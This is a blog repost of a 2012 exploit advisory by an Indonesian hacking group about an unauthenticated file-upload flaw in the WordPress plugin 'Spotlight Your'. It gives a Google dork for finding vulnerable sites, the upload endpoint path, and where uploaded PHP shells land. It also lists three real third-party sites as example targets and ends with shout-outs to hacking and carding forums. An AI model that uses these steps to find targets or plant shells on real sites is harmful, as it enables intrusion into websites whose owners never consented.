New Post

Monday, November 19, 2012

___________.__             _________                             _________                     
\__ ___/| |__ ____ \_ ___ \______ ______ _ ________ \_ ___ \______ ______ _ __
| | | | \_/ __ \ / \ \|_ __ \/ _ \ \/ \/ / ___/ / \ \|_ __ \/ __ \ \/ \/ /
| | | Y \ ___/ \ \___| | \( <_> ) /\___ \ \ \___| | \| ___/\ /
|____| |___| /\___ > \______ /__| \____/ \/\_//____ > \______ /__| \___ >\/\_/
\/ \/ \/ \/ \/ \/

INDO-PENDENT HACKER
http://thecrowscrew.org
#################################################################################################
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability
Google Dork: inurl:"/wp-content/plugins/spotlightyour/"
Date: 18/11/2012
Locations: Banjarmasin, Indonesia
Author: ovanIsmycode & walangkaji
Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org
Software Link: http://www.spotlightyour.com
#################################################################################################

[+] POC

Exp. Target :
- http://domain.com/wp-content/plugins/spotlightyour/

Exploit :
- /monetize/upload/index.php

Shell Access :
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php

Ending :
- Fraksi Bejoug a.k.a Kalam Saheru
Saparatoss Blank Blank
awkwkwkwk :v

http://beautyexo.com/wp-content/plugins/spotlightyour/monetize/upload/

http://www.promogotion.com/wp-content/plugins/spotlightyour/monetize/upload/

http://shopping.businessminister.com/wp-content/plugins/spotlightyour/monetize/upload/

#################################################################################################

Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, -=[The Crows Crew]=-, Indonesian Hacker

thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org

########################################[end]####################################################

# 1337day.com [2012-11-19]

0 nhận xét:

Post a Comment